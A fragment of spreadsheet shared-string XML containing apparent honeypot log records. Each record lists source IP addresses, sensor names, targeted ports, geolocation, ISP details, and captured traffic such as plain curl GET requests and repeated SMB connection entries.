    <t>SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17</t>
  </si>
  <si>
    <t>80&amp;&amp;23&amp;&amp;25936&amp;&amp;56841&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:9c84</t>
  </si>
  <si>
    <t>7fe4c957083ff07f31707d5a6d53f3d5</t>
  </si>
  <si>
    <t>59.126.203.187</t>
  </si>
  <si>
    <t>59-126-203-187.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_HTTP_H37&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;443&amp;&amp;80&amp;&amp;17338&amp;&amp;47910&amp;&amp;23&amp;&amp;9100&amp;&amp;11531&amp;&amp;50496&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:cbbb</t>
  </si>
  <si>
    <t>51cc525fe4349a4f2d2a104be1a2649b</t>
  </si>
  <si>
    <t>117.199.197.229</t>
  </si>
  <si>
    <t>::ffff:75c7:c5e5</t>
  </si>
  <si>
    <t>4eb0e95ac50771e56649b0d32fc1cf60</t>
  </si>
  <si>
    <t>185.193.94.15</t>
  </si>
  <si>
    <t>50</t>
  </si>
  <si>
    <t>Trøndelag</t>
  </si>
  <si>
    <t>Oppdal</t>
  </si>
  <si>
    <t>3143513</t>
  </si>
  <si>
    <t>7340</t>
  </si>
  <si>
    <t>62.5942</t>
  </si>
  <si>
    <t>9.691230000000001</t>
  </si>
  <si>
    <t>52157</t>
  </si>
  <si>
    <t>NEAS ENERGI TELEKOM AS</t>
  </si>
  <si>
    <t>NEAS Energi Telekom Oppdalsregionen</t>
  </si>
  <si>
    <t>Vitnett Fiber</t>
  </si>
  <si>
    <t>::ffff:b9c1:5e0f</t>
  </si>
  <si>
    <t>49c86859c737e077c06ae6f6afd33562</t>
  </si>
  <si>
    <t>96.18.188.241</t>
  </si>
  <si>
    <t>Woodbury</t>
  </si>
  <si>
    <t>Sioux City</t>
  </si>
  <si>
    <t>4876523</t>
  </si>
  <si>
    <t>51101</t>
  </si>
  <si>
    <t>42.4925</t>
  </si>
  <si>
    <t>-96.3997</t>
  </si>
  <si>
    <t>CABLEONE</t>
  </si>
  <si>
    <t>Cable One, Inc.</t>
  </si>
  <si>
    <t>::ffff:6012:bcf1</t>
  </si>
  <si>
    <t>d3ddd484241086c5053575ed26382329</t>
  </si>
  <si>
    <t>91.244.232.142</t>
  </si>
  <si>
    <t>IVA</t>
  </si>
  <si>
    <t>Ivanovo Oblast</t>
  </si>
  <si>
    <t>Str</t>
  </si>
  <si>
    <t>Zheleznodorozhnyy</t>
  </si>
  <si>
    <t>6423512</t>
  </si>
  <si>
    <t>55.839</t>
  </si>
  <si>
    <t>40.5202</t>
  </si>
  <si>
    <t>197175</t>
  </si>
  <si>
    <t>Albina Anatoljevna Kolesnik, PE</t>
  </si>
  <si>
    <t>Teleradiokompaniya Vizit-A Limited</t>
  </si>
  <si>
    <t>2012-08-17</t>
  </si>
  <si>
    <t>{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61996)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62208)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49753)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53424)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57361)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60927)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64509)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51577)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50932)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54261)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65387)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56052)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58453)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60892)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63336)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49441)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51931)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54427)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56929)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65522)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51950)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54786)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57601)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60313)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62966)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49292)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51937)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54614)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57274)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59842)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61982)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62156)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64351)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50177)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54484)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56595)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58708)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64990)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50671)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52750)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54819)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56884)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58959)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61041)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63122)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65217)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50976)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53090)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,55214)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52820)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63918)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49986)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52428)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57399)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59852)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54088)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56534)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59017)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61509)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64010)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50149)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52672)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,55170)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57638)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60126)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65104)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51284)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53769)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56227)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58734)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61165)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53196)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,55744)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,58301)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63295)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49395)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52260)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61851)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64683)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51200)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52387)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54919)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63093)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49247)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51763)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54341)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56878)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59392)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60681)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62278)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64029)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50949)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52654)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54253)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,55973)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57634)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59302)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61010)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62614)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64316)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49610)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51263)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52946)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54549)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,56234)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57925)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59631)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61330)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54092)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61675)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64030)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50102)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52527)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54841)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,57246)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62544)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62631)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64459)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49703)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51281)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52925)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54609)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63407)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63962)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64449)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65018)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65489)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50080)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50631)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51100)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51571)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52078)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,52581)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53119)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,53586)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,54094)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59130)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,59607)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60109)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,60545)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61077)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,61558)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62057)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,62528)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63015)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,63495)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64008)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64495)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,64978)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,65484)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,49573)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50112)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,50557)}&amp;&amp;{Data_SMB:Incoming connection (91.244.232.142,51035)}</t>
  </si>
  <si>
    <t>::ffff:5bf4:e88e</t>
  </si>
  <si>
    <t>6e7e49743efb715a7469092b6cc43ea6</t>
  </si>
  <si>
    <t>220.132.248.112</t>
  </si>
  <si>
    <t>220-132-248-112.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H36</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>connection&amp;&amp;GET&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:dc84:f870</t>
  </si>
  <si>
    <t>aebff0024bb54d6605c316b5457a4c0a</t>
  </si>
  <si>
    <t>114.33.53.209</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-53-209.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;48339&amp;&amp;56327&amp;&amp;23&amp;&amp;25755&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:35d1</t>
  </si>
  <si>
    <t>8d5a859207e7c115bb4471cb025effd7</t>
  </si>
  <si>
    <t>220.134.92.113</t>
  </si>
  <si>
    <t>220-134-92-113.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_HTTPS_H19&amp;&amp;SMA-LAB_NTP_H30&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_SSH_H18&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H30</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;443&amp;&amp;123&amp;&amp;1080&amp;&amp;22&amp;&amp;445&amp;&amp;26156&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:dc86:5c71</t>
  </si>
  <si>
    <t>bfcec332fa477a7c823c0b53e7509ed6</t>
  </si>
  <si>
    <t>1.34.52.67</t>
  </si>
  <si>
    <t>1-34-52-67.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;58321&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>2010-05-05</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:122:3443</t>
  </si>
  <si>
    <t>1963990a6d6eaf285744529517be3dbb</t>
  </si>
  <si>
    <t>103.153.218.250</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H45&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;23&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>Bình Dương Province</t>
  </si>
  <si>
    <t>Thành Phố Thủ Dầu Một</t>
  </si>
  <si>
    <t>Thu Dau Mot</t>
  </si>
  <si>
